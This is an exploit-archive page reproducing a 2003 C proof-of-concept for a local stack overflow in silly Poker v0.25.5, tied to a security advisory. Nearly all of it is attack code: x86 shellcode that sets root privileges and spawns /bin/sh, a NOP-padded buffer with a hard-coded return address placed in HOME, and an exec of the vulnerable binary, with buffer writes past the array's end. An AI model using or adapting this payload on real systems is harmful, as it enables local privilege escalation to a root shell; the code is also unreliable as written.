logo Home

Untitled Document

Home > Archives Exploits > Exploits


Untitled Document
silly Poker v0.25.5 local exploit
Date: 2003-10-02

Author : demz <demz@c-code.net>
Download : http://www.security-corporation.com/assets/security/download/exploit/c-sillyPoker.c

/* c-sillyPoker.c
*
* PoC exploit made for advisory based uppon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* silly Poker v0.25.5
*
* Tested on: Debian 3.1
*
* Advisory source: c-code.net (security research team)
* http://www.c-code.net/Releases/Advisories/c-code-adv002.txt
*
* ---------------------------------------------
* coded by: demz (c-code.net) (demz@c-code.net)
* ---------------------------------------------
*
*/

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x31\xc9" // xor ecx, ecx
"\xb0\x46" // mov al, 70
"\xcd\x80" // int 0x80

"\x31\xc0" // xor eax, eax
"\x50" // push eax
"\x68\x6e\x2f\x73\x68" // push long 0x68732f6e
"\x68\x2f\x2f\x62\x69" // push long 0x69622f2f
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x99" // cdq
"\xb0\x0b" // mov al, 11
"\xcd\x80" // int 0x80

"\x31\xc0" // xor eax, eax
"\xb0\x01" // mov al, 1
"\xcd\x80"; // int 0x80

int main()
{
unsigned long ret = 0xbffffb44;

char buffer[1028];
int i=0;

memset(buffer, 0x90, sizeof(buffer));

for (0; i < strlen(shellcode) - 1;i++)
buffer[500 + i] = shellcode[i];

buffer[1028] = (ret & 0x000000ff);
buffer[1029] = (ret & 0x0000ff00) >> 8;
buffer[1030] = (ret & 0x00ff0000) >> 16;
buffer[1031] = (ret & 0xff000000) >> 24;
buffer[1032] = 0x0;

printf("\nsilly Poker v0.25.5 local exploit\n");
printf("---------------------------------------- demz @ c-code.net --\n");

setenv("HOME", buffer, 1);

execl("/usr/bin/sillypoker", "sillypoker", NULL);
}







Any use of these codes are at the user's own responsibility.

 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy